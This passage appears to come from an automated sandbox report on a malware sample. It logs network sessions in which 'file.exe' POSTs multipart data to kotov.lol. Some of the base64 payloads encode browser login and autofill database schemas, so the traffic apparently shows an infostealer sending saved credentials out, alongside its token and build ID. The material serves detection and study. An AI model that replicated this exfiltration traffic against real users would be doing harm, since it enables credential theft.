                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:31 UTC158INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:30 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    17192.168.2.44976595.217.25.2284436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:30 UTC318OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary=----KFCFIEHCFIECBGCBFHIJ
                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                    Host: kotov.lol
                                                                                                                    Content-Length: 55081
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-11-30 10:34:30 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 33 64 37 32 30 30 66 65 33 35 39 31 65 65 30 39 39 35 39 37 33 32 37 31 39 65 37 31 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 35 62 61 33 63 32 35 66 61 37 62 38 30 31 31 32 33 34 61 64 30 39 64 37 37 62 36 33 34 66 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74
                                                                                                                    Data Ascii: ------KFCFIEHCFIECBGCBFHIJContent-Disposition: form-data; name="token"63d7200fe3591ee09959732719e71375------KFCFIEHCFIECBGCBFHIJContent-Disposition: form-data; name="build_id"c5ba3c25fa7b8011234ad09d77b634f1------KFCFIEHCFIECBGCBFHIJCont
                                                                                                                    2024-11-30 10:34:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:30 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:30 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:32 UTC158INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:32 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    2024-11-30 10:34:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    18192.168.2.44976695.217.25.2284436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:33 UTC319OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHII
                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                    Host: kotov.lol
                                                                                                                    Content-Length: 142457
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-11-30 10:34:33 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 33 64 37 32 30 30 66 65 33 35 39 31 65 65 30 39 39 35 39 37 33 32 37 31 39 65 37 31 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 35 62 61 33 63 32 35 66 61 37 62 38 30 31 31 32 33 34 61 64 30 39 64 37 37 62 36 33 34 66 31 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74
                                                                                                                    Data Ascii: ------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="token"63d7200fe3591ee09959732719e71375------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="build_id"c5ba3c25fa7b8011234ad09d77b634f1------AECAKECAEGDHIECBGHIICont
                                                                                                                    2024-11-30 10:34:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:33 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                    Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                    2024-11-30 10:34:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:33 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:35 UTC158INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:34 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    2024-11-30 10:34:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    19192.168.2.44976795.217.25.2284436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:35 UTC316OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary=----IDHCGDAFBKFIDHJJJDHC
                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                    Host: kotov.lol
                                                                                                                    Content-Length: 493
                                                                                                                    Connection: Keep-Alive
